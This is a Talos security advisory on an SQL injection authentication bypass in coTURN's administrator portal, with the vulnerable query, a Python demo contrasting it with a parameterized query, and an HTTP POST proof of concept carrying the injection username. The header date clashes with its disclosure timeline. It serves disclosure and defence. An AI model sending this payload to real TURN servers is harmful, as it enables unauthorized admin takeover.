Talos Vulnerability Report

TALOS-2018-0730

coTURN Administrator Web Portal SQL injection vulnerability

January 29, 2018
CVE Number

CVE-2018-4056

Summary

An exploitable SQL injection vulnerability exists in the administrator web portal function of coTURN prior to version 4.5.0.9. A login message with a specially crafted username can cause an SQL injection, resulting in authentication bypass, which could give access to the TURN server administrator web portal. An attacker can log in via the external interface of the TURN server to trigger this vulnerability.

Tested Versions

coTURN 4.5.0.5

Product URLs

https://github.com/coturn/coturn

CVSSv3 Score

9.1 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

CWE

CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)

Details

coTURN is an open-source implementation of TURN and STUN servers that can be used as a general-purpose networking traffic TURN server. TURN servers are usually deployed in so-called “DMZ” zones — any server reachable by the internet — to provide firewall traversal solutions. Attackers who are able to take over such servers may be able to bypass firewalls and conduct additional attacks.

According to Shodan, thousands of coTURN servers are directly reachable on the internet.

The username from POST requests to the login page is passed to the following snprintf call, which appears in each of the database driver files src/apps/relay/dbdrivers/dbd_mysql.c, src/apps/relay/dbdrivers/dbd_pgsql.c and src/apps/relay/dbdrivers/dbd_sqlite.c:

snprintf(statement, sizeof(statement), "select realm,password from admin_user where name='%s'", usname);

Because usname is copied into the query text without escaping or parameter binding, a crafted value can change the statement so that it returns an attacker-chosen password, which the login check then compares against the submitted pwd.

Even when no administrators are configured and the administrator web portal is deactivated, the portal still accepts POST requests, so it’s still possible to exploit this vulnerability and reactivate the portal.
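To make the query construction above concrete, the following added example (not coTURN's code, which is C; this is a Python reproduction against the standard library's sqlite3 module) builds an in-memory admin_user table with the three columns the query reads, runs the string-formatted statement that mirrors the snprintf call, and runs the parameterized form beside it. The table contents, the SAMPLE_ADMIN row and the login() helper are constructed for the example; the statement text is the one quoted in the advisory.

```python
"""Vulnerable string-formatted lookup next to a parameterized one.

Added example for the coTURN admin_user query; not the project's code.
The row below is a constructed sample, not a real credential."""
import sqlite3

# Constructed sample row: (name, realm, password) as stored in admin_user.
SAMPLE_ADMIN = ("admin", "example.org", "hashed-secret")


def make_db() -> sqlite3.Connection:
    """Create an in-memory admin_user table with the columns the query reads."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table admin_user (name text, realm text, password text)")
    conn.execute("insert into admin_user values (?, ?, ?)", SAMPLE_ADMIN)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, usname: str) -> list:
    """Mirror of the advisory's snprintf: usname is pasted into the SQL text.

    Like sqlite3_prepare() in the C driver, execute() compiles only the
    first statement, so a trailing '; --' comment neutralises the rest."""
    statement = "select realm,password from admin_user where name='%s'" % usname
    return conn.execute(statement).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, usname: str) -> list:
    """Hardened form: usname is bound as data, so quotes in it are literal."""
    statement = "select realm,password from admin_user where name=?"
    return conn.execute(statement, (usname,)).fetchall()


def login(conn: sqlite3.Connection, usname: str, pwd: str, lookup) -> bool:
    """Simplified stand-in for the portal's check: does any returned row carry pwd?"""
    rows = lookup(conn, usname)
    return any(stored == pwd for _realm, stored in rows)


if __name__ == "__main__":
    db = make_db()
    # Username from the advisory's proof of concept.
    crafted = "user' union select '','0000'; --"
    print("vulnerable   :", login(db, crafted, "0000", lookup_vulnerable))    # True
    print("parameterized:", login(db, crafted, "0000", lookup_parameterized)) # False
```

With the crafted username the formatted query returns the row ('', '0000') that the attacker supplied, so the password comparison succeeds without any admin_user row matching; the bound-parameter version looks for a user literally named "user' union select '','0000'; --", finds nothing, and the login fails. The MySQL and PostgreSQL drivers named above have equivalent binding interfaces (mysql_stmt_prepare with bound parameters, and PQexecParams), so the same separation of query text from data applies to all three files.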

Exploit proof of concept

POST /logon HTTP/1.1
Host: 192.168.0.2:443
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

uname=user' union select '','0000'; --&pwd=0000

Timeline

2017-09-04 - Vendor Disclosure
2019-01-29 - Public Disclosure

Credit

Discovered by Nicolas Edet of Cisco.